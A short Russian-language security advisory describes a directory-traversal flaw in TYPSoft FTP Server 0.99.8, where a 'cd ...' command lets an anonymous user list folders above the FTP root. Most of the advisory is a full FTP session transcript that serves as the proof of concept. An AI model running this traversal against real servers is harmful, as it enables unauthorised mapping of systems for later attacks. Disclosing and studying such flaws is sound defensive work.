Просмотр структуры каталогов в TYPSoft FTP сервере

Уязвимость связанна с недостаточной фильтрацией последовательности "." в URL запросах. Любой удаленный пользователь с законным или анонимным доступом к уязвимому TYPSoft FTP серверу может эксплуатировать уязвимость и свободно просмотреть структуру каталогов на уязвимой системе. Такая информация может оказаться полезной в последующих нападениях. Пример:

C:\>ftp 10.20.30.40
Connected to 10.20.30.40.
220 TYPSoft FTP Server 0.99.8 ready...
User (10.20.30.40:(none)): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
 
. 
226 Transfer complete.
ftp: 7 bytes received in 0.00Seconds 7000.00Kbytes/sec.
ftp> cd /
250 CWD command successful. "/C:/Inetpub/ftproot/" is current directory.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
 
. 
226 Transfer complete.
ftp: 7 bytes received in 0.00Seconds 7000.00Kbytes/sec.
ftp> cd ..
550 'C:\Inetpub\ftproot\Inetpub\': no such file or directory.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
 
. 
226 Transfer complete.
ftp: 7 bytes received in 0.00Seconds 7000.00Kbytes/sec.
ftp> cd ...
250 CWD command successful. "/C:/Inetpub/ftproot/.../" is current directory.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
 
. 
AdminScripts
ftproot
iissamples
mailroot
Scripts
webpub
wwwroot
226 Transfer complete.
ftp: 78 bytes received in 0.01Seconds 7.80Kbytes/sec.
ftp> bye
221 Goodbye!